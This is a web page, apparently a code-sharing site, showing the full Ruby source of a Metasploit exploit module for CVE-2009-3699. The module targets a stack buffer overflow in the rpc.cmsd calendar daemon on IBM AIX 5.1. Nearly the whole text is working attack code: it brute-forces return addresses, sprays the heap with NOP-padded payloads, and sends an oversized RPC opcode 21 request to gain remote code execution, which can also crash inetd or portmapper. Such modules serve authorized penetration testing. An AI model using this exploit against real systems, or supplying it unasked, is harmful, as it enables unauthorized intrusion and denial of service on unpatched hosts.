扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 |
## # $Id: rpc_cmsd_opcode21.rb 10998 2010-11-11 22:43:22Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow', 'Description'=> %q{ This module exploits a buffer overflow vulnerability in opcode 21 handled by rpc.cmsd on AIX. By making a request with a long string passed to the first argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This leads to arbitrary code execution. NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where further attempts are not possible. }, 'Author' => [ 'Rodrigo Rubira Branco (BSDaemon)', 'jduck', ], 'Version'=> '$Revision: 10998 $', 'References' => [ [ 'CVE', '2009-3699' ], [ 'OSVDB', '58726' ], [ 'BID', '36615' ], [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825' ], [ 'URL', 'http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc' ] ], 'Platform' => [ 'aix' ], 'Payload'=> { 'Space' => 4104, 'BadChars' => "\x00", # The RPC function splits the string by 0x40, watch out! # It's not a payload badchar since we're putting the payload elsewhere... 'DisableNops' => true }, 'Targets'=> [ [ 'IBM AIX Version 5.1', { 'Arch' => 'ppc', 'Platform' => 'aix', 'AIX'=> '5.1', 'Bruteforce' => { 'Start' => { 'Ret' => 0x2022dfc8 }, #worked on ibmoz - 'Start' => { 'Ret' => 0x2022e8c8 }, 'Stop'=> { 'Ret' => 0x202302c8 }, 'Step'=> 600 } } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 07 2009')) end def brute_exploit(brute_target) if not @aixpayload datastore['AIX'] = target['AIX'] @aixpayload = regenerate_payload.encoded end print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret']) begin if (not sunrpc_create('udp', 100068, 4)) raise RuntimeError, 'sunrpc_create failed' end # spray the heap a bit (work around powerpc cache issues) buf = make_nops(1024 - @aixpayload.length) buf << @aixpayload xdr = XDR.encode(buf, buf) 10.times { sunrpc_call(7, xdr, 2) } #print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5) buf = rand_text_alphanumeric(payload_space) buf << [brute_target['Ret']].pack('N') xdr = XDR.encode(buf, "") sunrpc_authunix('localhost', 0, 0, []) sunrpc_call(21, xdr, 2) handler(sunrpc_callsock) sunrpc_destroy rescue Rex::Proto::SunRPC::RPCTimeout # print_error('RPCTimeout') rescue EOFError # print_error('EOFError') end end end |
体验盒子
